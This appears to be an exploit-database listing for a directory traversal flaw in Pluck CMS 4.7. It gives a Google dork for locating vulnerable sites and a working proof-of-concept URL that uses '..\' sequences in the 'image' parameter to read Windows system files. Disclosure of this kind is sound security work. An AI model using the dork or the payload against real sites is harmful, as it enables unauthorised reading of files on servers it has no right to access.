header-logo
Suggest Exploit
vendor:
Pluck
by:
Wadeek
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Pluck
Affected Version From: 4.7
Affected Version To: 4.7
Patch Exists: NO
Related CWE: N/A
CPE: a:pluck_cms:pluck
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Xampp on Windows7
2015

Pluck 4.7 Directory Traversal

Pluck 4.7 is vulnerable to directory traversal. An attacker can exploit this vulnerability to access sensitive files outside the web root directory. This vulnerability is due to insufficient sanitization of user-supplied input to the 'image' parameter in '/data/modules/albums/albums_getimage.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with directory traversal sequences (e.g. '../../../../../../../Windows/system.ini') to the vulnerable script. Successful exploitation will allow an attacker to access sensitive files outside the web root directory.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################

Navigation

Suggest Exploit

Services By CQR